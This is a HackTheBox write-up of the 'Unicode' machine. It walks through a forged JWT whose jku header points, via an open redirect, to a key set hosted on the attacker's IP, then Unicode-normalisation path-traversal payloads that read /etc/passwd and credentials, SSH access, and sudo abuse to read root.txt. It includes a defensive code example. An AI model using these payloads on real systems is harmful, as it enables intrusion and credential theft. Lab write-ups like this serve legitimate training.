Unicode — HackTheBox Machine WriteUp

Saad Akhtar
5 min read, May 7, 2022

This post is a walkthrough of Unicode, a Medium-difficulty machine on HackTheBox.

Enumeration

Starting out with the initial nmap scan:

nmap -A -vv 10.10.11.126

We have ports 22 and 80 open, so let's enumerate port 80 first.

We have a webpage named Hackmedia.

Enumerating further we have a login page.

I tried SQL injection but it didn't work, so I registered an account and logged in with it to test the functionality.

We have a user dashboard. Next we can check the file upload functionality.

After testing this feature I couldn't bypass it, so I moved on to test other things.

Gaining Access

Looking at the cookie, we have a JWT token.

Looking at the decoded token, there are a few things we can tweak to log in as admin and escalate further.

I'll add hackmedia.htb to the /etc/hosts file:

echo "10.10.11.126 hackmedia.htb" | sudo tee -a /etc/hosts

Visiting the link above we have the following page.

Now here's what we'll be doing. First we'll create another RSA key and replace the values in the above jwks.json file with ours. Then we'll point the original JWT at our tweaked jwks.json file.

The following command generates an RSA key pair:

openssl genrsa -out key.pem 2048

The following Python script loads our key file and prints the values we need to change in the jwks.json file:

from jwcrypto import jwk

# Load the RSA key generated by openssl above
with open('key.pem', 'rb') as pem:
    key = jwk.JWK.from_pem(pem.read())

# Dump the key as JSON; the public modulus 'n' (and 'kid') are the values
# that go into jwks.json. Note that this also prints the private parameters,
# so don't paste the whole output anywhere public.
print(f'{key}')
print(f'n: {key.n}')

We'll replace the 'n' and 'kid' values in the jwks.json file.

Now our jwks.json file is as follows:

We'll start a Python HTTP server so the target can fetch our tweaked jwks.json file:

python3 -m http.server 80

The following script regenerates the JWT, pointing the jku header at our jwks.json file and changing the value of user to admin:

from jwcrypto import jwk, jwt

# Load the same RSA key whose public part is now in our jwks.json
with open('key.pem', 'rb') as pem:
    key = jwk.JWK.from_pem(pem.read())

# The jku header goes through the site's own open redirect so that the
# URL still starts with hackmedia.htb, while the key set is fetched from us.
# 10.10.14.160 is the attacking machine's IP from the lab.
my_token = jwt.JWT(
    header={'alg': 'RS256',
            'jku': 'http://hackmedia.htb/static/../redirect/?url=10.10.14.160/jwks.json'},
    claims={'user': 'admin'},
)
my_token.make_signed_token(key)
print(my_token.serialize())

Now looking at our token we have:

Now we'll replace the original token in the cookie with the one above.

Boom! We are logged in to the admin dashboard.

After testing for a while, I found that the Current Month page could be vulnerable to LFI.

Accessing the following URL we get:

hackmedia.htb/display/?page=../../etc/passwd

Looking at the error message, we can assume there is some sort of filtering. After looking around and some trial and error, I bypassed the filter and read the /etc/passwd file:

http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/passwd

We can see that we have a user named code.
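The bypass above works because %EF%B8%B0 decodes to U+FE30, a compatibility character that NFKC normalisation folds to "..", so a filter that checks the raw string for "../" and only normalises afterwards never sees the traversal. The following added Python example (not the box's code; the template root is an assumed placeholder) models that flawed ordering next to a hardened resolver that normalises first and then confines the result to the base directory.

```python
import os
import unicodedata
from typing import Optional
from urllib.parse import unquote

# Assumed template root for the /display/?page= handler (constructed placeholder).
BASE_DIR = "/srv/app/templates"


def naive_filter(page: str) -> Optional[str]:
    """Models the flawed ordering: the traversal check runs on the raw value,
    and NFKC normalisation happens afterwards. Returns the string the
    application would go on to open, or None if the request was rejected."""
    raw = unquote(page)
    if "../" in raw:
        return None
    # U+FE30 (%EF%B8%B0) is a compatibility form that NFKC folds to "..",
    # so the traversal only appears after the check has already passed.
    return unicodedata.normalize("NFKC", raw)


def safe_resolve(page: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Hardened version: normalise first, then resolve the path against the
    template root and refuse anything that escapes it. This also neutralises
    absolute paths, which os.path.join would otherwise honour."""
    raw = unicodedata.normalize("NFKC", unquote(page))
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, raw))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    payload = "%EF%B8%B0/%EF%B8%B0/etc/passwd"
    print("naive:", naive_filter(payload))  # ../../etc/passwd slips through
    print("safe :", safe_resolve(payload))  # None
```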

From the initial nmap scan we know the server is running nginx, so we can try to read the default nginx config file:

http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/etc/nginx/sites-available/default

The config references a db.yaml file, which could contain valid credentials. Looking around for that file, I found it at the following path:

http://hackmedia.htb/display/?page=%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/%EF%B8%B0/home/code/coder/db.yaml

Boom! We have some creds. Let's try them over SSH:

ssh code@hackmedia.htb

And we’re in.

user.txt

Reading the user.txt file:

Privilege Escalation

sudo -l

Running the above command, we can see that our user can run /usr/bin/treport as root.

Let's run the binary first to test its functionality.

Testing the functionality, I noticed that the binary has four options. The most important ones are 2 and 3: option 3 downloads a file given an IP or a file name, and option 2 reads that file. The binary uses the curl command to fetch the files.

root.txt

Since we can download a file via an IP or a file name, I downloaded the root.txt file and read it.

Thanks for reading!
